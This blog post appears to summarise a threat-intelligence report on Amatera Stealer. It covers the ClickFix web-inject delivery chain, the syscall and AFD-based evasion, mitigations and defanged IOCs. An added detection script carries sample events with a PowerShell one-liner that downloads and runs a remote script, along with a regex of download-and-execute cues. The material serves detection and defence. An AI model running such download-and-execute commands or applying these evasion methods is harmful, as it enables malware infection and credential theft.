Thursday, March 5, 2026

Advanced Web Injection and Anti-Analysis Tactics Used to Deliver Amatera Stealer

Proofpoint researchers have uncovered advanced campaigns distributing Amatera Stealer, a rebranded evolution of ACR Stealer, through compromised websites.

The malware is delivered through ClearFake web injects: legitimate sites are compromised to load malicious JavaScript, with the next-stage script fetched via EtherHiding (payloads stored in Binance Smart Chain smart contracts rather than on a takedown-prone server). This initiates a multi-stage attack:

[Figure: fake CAPTCHA verification overlay]
  1. Victims encounter a fake CAPTCHA overlay urging "human verification"
  2. Users are socially engineered into pressing Win+R and pasting a malicious PowerShell command into the Run dialog
  3. The pasted command downloads a .csproj project file and runs it with msbuild.exe, which executes the obfuscated PowerShell payloads it contains
  4. Final-stage shellcode (generated with the Clematis tool) deploys Amatera Stealer using Early Bird (APC) and context-hijack injection: a legitimate process (e.g., OpenWith.exe) is started suspended and the malware executes in its memory

Because the later stages run in memory and the chain rides on Windows' native tools (msbuild.exe, PowerShell), it evades traditional file scanning and blends in with legitimate activity.

Next-Gen Evasion: NTSockets and WoW64 Syscalls

Amatera employs notable anti-analysis features to evade detection:

  • NTSockets Communication:
    Instead of the Winsock API, Amatera talks to the Ancillary Function Driver directly through the \Device\Afd\Endpoint device. User-mode hooks on Winsock (ws2_32.dll) therefore never see its C2 traffic, which hides it from EDR products that depend on those hooks. Observed samples connect directly to Cloudflare IP addresses using hostnames that do not resolve in public DNS (e.g., overplanteasiest[.]top), so there is no DNS lookup to catch and domain blocklists are ineffective.
  • WoW64 Syscalls:
    The 32-bit payload resolves Native API addresses dynamically, reads the System Service Numbers (SSNs) out of the ntdll stubs, and issues syscalls through Wow64Transition (the 32-to-64-bit transition) instead of calling the exported functions. This:
    • Bypasses user-mode API hooking placed on the ntdll exports
    • Uses a modified djb2 hash to locate NTDLL functions rather than import tables or GetProcAddress
    • Executes syscalls directly for critical operations (file and process manipulation)

Modular Payloads and Updated C2 Infrastructure

Unlike its predecessor, Amatera:

  • Drops the Steam/Telegram dead-drop resolvers in favour of direct IP-based C2
  • Retrieves a JSON configuration over HTTP(S), enabling:
    • Customized data theft (browsers, crypto wallets, messenger apps)
    • Secondary payload execution (.exe, .ps1 or .dll, via ShellExecuteA or Invoke-Expression (IEX))
  • Supports HTTPS C2 built on the Schannel API (e.g., amaprox[.]icu)

Recent samples add an "ld" (load) key to the JSON configuration that points at additional malware to fetch.

Mitigation Recommendations

  1. Restrict PowerShell execution for standard users (application control or Constrained Language Mode)
  2. Alert on msbuild.exe spawning uncommon child processes, and on msbuild.exe launched by a shell with a .csproj from a user-writable directory
  3. Inspect network traffic to CDN IP addresses whose hostnames do not resolve in DNS
  4. Hunt for processes that open \Device\Afd\Endpoint directly instead of going through Winsock
  5. Educate users on "ClickFix" social engineering (misuse of the Windows Run dialog)
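The process-level checks from the attack chain and from recommendations 1, 2 and 5, as an added example that is not part of the report: triage logic run over constructed Sysmon-style process-creation records (Event ID 1 field names Image, ParentImage, CommandLine). The events, the IP 203.0.113.7 (documentation range) and the MSBuild child allowlist are made up or assumed for the demo; the AFD and network hunts (3 and 4) are not covered because they need endpoint or network telemetry, not process logs.

```python
# Added example: flag the ClickFix launch (explorer.exe -> PowerShell with
# download/exec cues), MSBuild started by a shell on a .csproj, and MSBuild
# spawning unexpected children. Events below are constructed, not real IOCs.
import re
from typing import Dict, List, Tuple

# Children MSBuild spawns in a normal build (assumed baseline; tune per environment).
MSBUILD_EXPECTED_CHILDREN = {"csc.exe", "vbc.exe", "cl.exe", "link.exe", "conhost.exe", "msbuild.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Cues typical of the one-liner pasted into the Run dialog.
CLICKFIX_CUES = re.compile(
    r"(?i)(invoke-webrequest|\biwr\b|invoke-expression|\biex\b|downloadstring|"
    r"-enc\b|-encodedcommand|\bhidden\b)"
)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (event id, rule name) pairs for every event that matches a rule."""
    hits = []
    for ev in events:
        image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
        cmd = ev.get("CommandLine", "")
        # Rule 1: Run-dialog launch. Win+R makes explorer.exe the parent of the shell.
        if image in {"powershell.exe", "pwsh.exe"} and parent == "explorer.exe" and CLICKFIX_CUES.search(cmd):
            hits.append((ev["id"], "clickfix_run_dialog"))
        # Rule 2: a shell handing a project file to MSBuild (stage 3 of the chain).
        if image == "msbuild.exe" and parent in SHELLS and ".csproj" in cmd.lower():
            hits.append((ev["id"], "msbuild_from_shell"))
        # Rule 3: MSBuild spawning something a build would not (PowerShell, OpenWith.exe, ...).
        if parent == "msbuild.exe" and image not in MSBUILD_EXPECTED_CHILDREN:
            hits.append((ev["id"], "msbuild_uncommon_child"))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

# Constructed events mirroring the described chain plus two benign controls.
SAMPLE_EVENTS = [
    {"id": "e1", "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iex (iwr http://203.0.113.7/cf.txt)"'},
    {"id": "e2", "Image": MSBUILD, "ParentImage": PS,
     "CommandLine": r"MSBuild.exe C:\Users\Public\update.csproj"},
    {"id": "e3", "Image": PS, "ParentImage": MSBUILD,
     "CommandLine": "powershell.exe -nop -w hidden -e SQBFAFgA"},   # fake base64, constructed
    {"id": "e4", "Image": r"C:\Windows\System32\OpenWith.exe", "ParentImage": MSBUILD,
     "CommandLine": "OpenWith.exe"},
    {"id": "e5", "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "ParentImage": MSBUILD, "CommandLine": "csc.exe /noconfig /out:app.dll"},
    {"id": "e6", "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe"},   # interactive launch, no download cues
]

if __name__ == "__main__":
    for event_id, rule in triage(SAMPLE_EVENTS):
        print(event_id, rule)
```

Rule 3 is the one worth keeping loose: the injection target here is OpenWith.exe, but any suspended child of msbuild.exe that is not a compiler or linker deserves a look, so maintain the allowlist rather than a denylist of known targets.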

IOC Highlights

  • IPs: 104.21.80[.]117, 172.67.178[.]5
  • Domains: amaprox[.]icu, b1[.]talismanoverblown[.]com
  • Hashes: 120316ecaf06b76a564ce42e11f7074c52df6d79b85d3526c5b4e9f362d2f1c2 (Amatera)

Amatera exemplifies the industrial evolution of stealers, combining web compromises, in-memory execution, and direct syscalls that sidestep user-mode hooks for persistent data theft.

As Lumma Stealer's dominance wanes, this malware-as-a-service (MaaS) offering is positioned for increased adoption among cybercriminals.
